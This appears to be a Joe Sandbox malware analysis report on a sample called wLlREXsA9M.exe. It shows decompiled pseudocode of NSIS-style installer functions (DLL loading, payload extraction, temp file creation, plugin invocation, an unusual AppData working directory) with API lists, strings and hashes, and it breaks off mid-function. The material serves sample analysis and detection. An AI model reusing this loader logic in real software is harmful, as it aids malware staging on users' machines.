				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t16 + 0x409014, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, "true"); // executed
				return _t14;
			}

0x004060cf
0x004060d8
0x004060da
0x004060da
0x004060de
0x004060f0
0x004060ea
0x004060ea
0x004060ea
0x00406108
0x0040611c
0x00406123

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060CF
wsprintfA.USER32 ref: 00406108
LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 0040611C

Strings

\, xrefs: 004060E0
%s%s.dll, xrefs: 00406102
UXTHEME, xrefs: 004060C1

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: e55cdf5f871f8b84aea1dba68012745cb5677463dfac46c34e6bae6131c5a878
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: AEF0F630A40219ABEB24D768DC0DFEB365CAB08305F1401BAA546E11D1EAB8E9248B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F33 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402F33(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				char _v84;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x40e8c0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E00403125( *0x423758 + _t56);
				}
				if(E0040310F( &_a16, ?str?) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E0040310F(0x40a8c0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E00405AA7(_a8, 0x40a8c0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E0040310F(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406209(0x40a830);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E0040310F(0x40a8c0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40a848 = 0x40a8c0;
						 *0x40a84c = _t92;
						while(1) {
							 *0x40a850 = _t81;
							 *0x40a854 = _v12; // executed
							_t69 = E00406229(0x40a830); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40a850; // 0x40e8c0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x4237b4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, "true", _a4));
								_t95 = _t95 + 0xc;
								E00404FA6(0,  &_v84); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40a850; // 0x40e8c0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405AA7(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push("true");
						goto L34;
					}
					goto L33;
				}
			}

0x00402f3b
0x00402f3f
0x00402f42
0x00402f47
0x00402f49
0x00402f49
0x00402f50
0x00402f54
0x00402f58
0x00402f5a
0x00402f5a
0x00402f5f
0x00402f64
0x00402f6f
0x00402f6f
0x00402f81
0x004030c6
0x004030c6
0x00000000
0x00402f87
0x00402f8b
0x004030b1
0x004030fa
0x004030cb
0x004030d1
0x004030d3
0x004030d3
0x004030e4
0x00000000
0x004030e6
0x004030eb
0x004030f2
0x004030ab
0x004030ab
0x004030c8
0x004030c8
0x00000000
0x004030c8
0x004030f4
0x004030f7
0x00000000
0x004030f7
0x004030e4
0x00403105
0x00000000
0x00403105
0x004030b6
0x004030b8
0x004030b8
0x004030c4
0x00403102
0x00000000
0x00000000
0x00000000
0x00000000
0x004030c4
0x00402f9c
0x00402f9f
0x00402fa4
0x00402fa4
0x00402fae
0x00402fb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00402fb7
0x00402fb7
0x00402fb7
0x00402fbf
0x00402fc1
0x00402fc1
0x00402fd2
0x00000000
0x00000000
0x00402fd8
0x00402fdb
0x00402fe1
0x00402fe7
0x00402fef
0x00402ff5
0x00402ffa
0x00403001
0x00403004
0x00000000
0x00000000
0x0040300a
0x00403010
0x00403012
0x0040301f
0x00403021
0x0040304f
0x00403055
0x0040305e
0x00403063
0x00403063
0x00403068
0x0040309f
0x00000000
0x00000000
0x00000000
0x0040306a
0x0040306e
0x00403083
0x00403086
0x00403089
0x0040308f
0x00403093
0x00000000
0x00000000
0x00000000
0x00403099
0x00403075
0x0040307c
0x00000000
0x00000000
0x0040307e
0x00000000
0x0040307e
0x00403068
0x004030a7
0x00000000
0x004030a7
0x00000000
0x00402fb7

APIs

GetTickCount.KERNEL32 ref: 00402F91
GetTickCount.KERNEL32 ref: 00403012
MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 0040303F
wsprintfA.USER32 ref: 0040304F

Strings

... %d%%, xrefs: 00403049

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 292f835b3181467873e9a92226761768417605a9b5c6a6e52be518de7c5fde7b
Instruction ID: fb2fc5817d24c3163c7c22d9ac44b76f986ad85bce22aa8463348177e39e35cb
Opcode Fuzzy Hash: 292f835b3181467873e9a92226761768417605a9b5c6a6e52be518de7c5fde7b
Instruction Fuzzy Hash: 4151917190121A9BDF10EF65DA04A9F7FB8AB04765F14413BF800B72C4D7789E51CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405A2F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00405A2F(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_push("true");
				_pop(_t20);
				while(1) {
					_t11 =  *0x4093ac; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405a33
0x00405a37
0x00405a39
0x00405a3a
0x00405a3a
0x00405a3f
0x00405a40
0x00405a43
0x00405a4d
0x00405a5a
0x00405a5d
0x00405a65
0x00000000
0x00000000
0x00405a69
0x00000000
0x00000000
0x00405a6b
0x00000000
0x00405a6b
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405A43
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A5D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A32
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 00405A2F
nsa, xrefs: 00405A3A

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-168577183
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: e10ef760629a4a35e01d8ad3e749fa5c5be5ec906a7d4b9207f434e9f6d184ca
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: 3DF0E2367082186BDB108F15EC44B9B7B9CDF91710F10C037FA449A180D2B19D448B98

Uniqueness

Uniqueness Score: -1.00%

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
				_push(1); // executed
				_t34 = E10001A5D(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021B0(_t50);
					}
					E100021FA(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100023DA(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_push("true");
								_t12 = _t50 + 0x818; // 0x818
								_pop(_t57);
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001559(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023DA(_t50);
								_push("true");
								_pop(_t61);
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100023DA(_t50);
							_t34 = GlobalFree(E10001266(E10001559(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100023A0(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014E2( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002AA3(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100027E8(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002589(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x100016bd
0x100016bd
0x100016bd
0x100016c7
0x100016cf
0x100016dc
0x100016ea
0x100016ed
0x100016ef
0x100016f4
0x100016f9
0x1000180c
0x1000180c
0x100016ff
0x10001703
0x10001706
0x1000170b
0x1000170d
0x10001713
0x10001719
0x10001749
0x10001750
0x10001774
0x100017b3
0x10001776
0x10001776
0x10001777
0x10001778
0x1000177a
0x10001780
0x10001784
0x10001787
0x1000178c
0x1000178c
0x10001793
0x10001799
0x1000179f
0x100017a9
0x100017ab
0x100017ac
0x100017af
0x10001752
0x10001753
0x10001768
0x10001768
0x100017bd
0x100017c0
0x100017cd
0x100017d4
0x100017dc
0x100017df
0x100017df
0x100017dc
0x100017ec
0x100017f4
0x100017f9
0x100017ec
0x10001801
0x00000000
0x10001803
0x00000000
0x10001804
0x10001801
0x1000171d
0x10001720
0x1000173e
0x00000000
0x00000000
0x10001741
0x10001746
0x10001746
0x10001748
0x00000000
0x10001748
0x10001722
0x10001723
0x1000172b
0x1000172c
0x00000000
0x1000172c
0x10001725
0x10001726
0x10001734
0x00000000
0x10001734
0x10001729
0x00000000
0x00000000
0x00000000
0x10001729

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(?,7D8BEC45), ref: 100021E2

Part of subcall function 10002589: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00401FFF(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4237b8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423788 =  *0x423788 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402ACE("true");
				 *(_t34 + 8) = E00402ACE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, "true"); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FA6(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x424000, 0x40a7ec, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036AD(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401fff
0x00401fff
0x00402004
0x0040200b
0x004020c6
0x00402233
0x00402233
0x0040295e
0x00402961
0x0040296d
0x0040296d
0x0040201a
0x00402024
0x00402027
0x00402036
0x0040203a
0x00402040
0x00402044
0x004020bf
0x00000000
0x004020bf
0x00402046
0x0040204f
0x00402053
0x00402097
0x00402055
0x00402058
0x0040205b
0x0040208b
0x0040205d
0x00402060
0x00402069
0x0040206b
0x0040206b
0x00402069
0x0040205b
0x0040209f
0x004020b4
0x004020b4
0x00000000
0x0040209f
0x0040202a
0x00402030
0x00402034
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 0040202A

Part of subcall function 00404FA6: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000,?), ref: 00404FDF
Part of subcall function 00404FA6: lstrlenA.KERNEL32(00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000), ref: 00404FEF
Part of subcall function 00404FA6: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00403063,00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000), ref: 00405002
Part of subcall function 00404FA6: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll), ref: 00405014
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040503A
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405054
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405062

LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 0040203A
GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 004020B4

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: d6f9476cf8cc98c1befb7d22f9089d3c7590ee35f4ff15c99e1e323cfaaae578
Instruction ID: aced698992336e14e7f2facf4f8c785189cbf29606bfadb53c29be32a570c67d
Opcode Fuzzy Hash: d6f9476cf8cc98c1befb7d22f9089d3c7590ee35f4ff15c99e1e323cfaaae578
Instruction Fuzzy Hash: F121D771E00225F7DF307FA48E48A5E7A756B44354F20413BF701B22D1C6BE4A42D65E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402ACE("true");
				_t13 = E00405898(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E0040582A(_t30, "true");
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004054E9(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405506(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040546C(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405D8D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest\\Narkocentret", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x00402233
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402961
0x0040296d

APIs

Part of subcall function 00405898: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,?,00405904,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A6
Part of subcall function 00405898: CharNextA.USER32(00000000), ref: 004058AB
Part of subcall function 00405898: CharNextA.USER32(00000000), ref: 004058BF

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 0040160D

Part of subcall function 0040546C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054AF

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret,00000000,00000000,?), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret
API String ID: 1892508949-111384604
Opcode ID: 0ca47f8405e0230cb95229f90361a5234e2932c60a7b44f9e6bf6cbd0c2a0e5b
Instruction ID: 9407852d547171c7c5e1bd74b6de6be0ce3b30ce27a8a18ca02bf699577aab09
Opcode Fuzzy Hash: 0ca47f8405e0230cb95229f90361a5234e2932c60a7b44f9e6bf6cbd0c2a0e5b
Instruction Fuzzy Hash: DF11E631608151AADB217EA54D405BF26B09A92324B28457FE4D1B22D2D53D4D42A62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040680D Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040680D() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
